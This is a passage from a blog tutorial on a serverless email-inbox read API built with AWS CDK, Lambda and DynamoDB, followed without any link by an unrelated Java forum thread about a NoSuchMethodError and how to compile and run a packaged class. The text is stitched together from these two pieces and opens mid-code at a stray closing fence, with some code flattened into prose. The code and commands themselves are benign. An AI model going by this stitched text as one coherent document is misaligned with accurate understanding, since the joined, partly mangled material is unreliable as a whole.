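function ttlSevenDaysFrom(date) {
  const copy = new Date(date.getTime());
  copy.setDate(copy.getDate() + 7); // same approach as the handler above
  return Math.floor(copy.getTime() / 1000);
}

const now = new Date('2020-09-29T12:00:00.000Z');
console.log(ttlSevenDaysFrom(now)); // epoch-seconds timestamp seven days later
```

Without the floor, the handler's division can produce a fractional value; flooring keeps the attribute in the whole-second format DynamoDB's TTL sweeper expects.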
Now that we receive mail directly into our database, let’s build an API to access the mail. The Read API The Read API consists of an API Gateway and a Lambda function with read access to the DynamoDB table. If you haven’t built such an API before, I recommend that you check out Marcia’s video on how to build serverless APIs. Below you can see the abbreviated CDK code to set up the API Gateway and Lambda function. You can find the full source code on GitHub. import * as cdk from '@aws-cdk/core'; import { LambdaRestApi } from '@aws-cdk/aws-apigateway'; import { Table } from '@aws-cdk/aws-dynamodb'; export class InboxApiStack extends cdk.Stack { constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) { super(scope, id, props); const table = new Table(this, 'TempMailMetadata', { ... }); const apiFunction = new Function(this, 'ApiLambda', { environment: { 'TABLE': table.tableName, } }); table.grantReadData(apiFunction); new LambdaRestApi(this, 'InboxApi', { handler: apiFunction, }); } } API Gateway is able to directly integrate with DynamoDB, but to continue using the database model I built with dynamodb-toolbox I have to go through a Lambda function. I also feel more comfortable writing TypeScript than Apache Velocity Templates. With the lambda function below, we load mails for a particular recipient and can filter to only return mails that arrived after a given timestamp. 
import { APIGatewayProxyHandler } from 'aws-lambda';
// the model uses dynamodb-toolbox
import { Mail } from './model';

export const handler: APIGatewayProxyHandler = async (event) => {
    const queryParams = event.queryStringParameters;
    const recipient = queryParams?.recipient;
    if (!recipient) {
        return {
            statusCode: 400,
            body: 'Missing query parameter: recipient'
        }
    }

    const since = queryParams.since || '';
    const limit = +queryParams.limit || 1;

    const mails = (await Mail.query(
        recipient,
        {
            beginsWith: since,
            limit,
        }
    )).Items;

    return {
        statusCode: 200,
        body: JSON.stringify(mails)
    }
}

After deploying the read API, you can run a GET request that includes the recipient's address as the recipient query parameter. You can further tweak your calls by providing a since timestamp, or a limit greater than the default of 1. For example, if you are sending an order confirmation to random-uuid@inbox-api.domain.com, then you query the API with recipient=random-uuid@inbox-api.domain.com.

Limitations and Potential Improvements

While the SES sandbox restricts how many emails you can send, there seems to be no limitation on receiving mail.

Our solution is not yet capable of providing attachments or the mail body. The SES S3 action already stores those in a bucket, which can be used for an improved read API function.

We could also drop the Lambda function that ties together the API Gateway and DynamoDB, by replacing it with a direct integration between the two services.

Try it Yourself

Check out the source code on GitHub. There's a step-by-step guide for you to try out this solution. Do you need help? Send me a message on Twitter or via mail!

Further Reading

- Source code on GitHub
- Receipt Rules
- Test email edge cases with the AWS mailbox simulator
- DynamoDB TTL

Enjoyed this article? I publish a new article every month. Connect with me on Twitter and sign up for new articles to your inbox!
https://bahr.dev/2020/09/29/validate-email-workflows/
Hi, here is my code:

package project1;

public class dddddddddd {
    public static void main(String[] args) {
        System.out.println("dddddddddddddddd");
    }
}

But the output is as follows:

run:
java.lang.NoSuchMethodError: main
Exception in thread "main"
Java Result: 1
BUILD SUCCESSFUL (total time: 0 seconds)

Please help me with this. Thanks in advance.

I checked your code in the Eclipse IDE; there is no problem executing it there. But if you are executing it from the command prompt (CMD), you first need to compile it inside the project1 folder:

...\project1>javac dddddddddd.java

Then, because the class is declared in the project1 package, run it from the parent directory (the one that contains project1):

java project1.dddddddddd

Hope this will solve your problem.

Ya, thanks a lot... great observation.
http://www.roseindia.net/answers/viewqa/Java-Beginners/17806-JAVA.html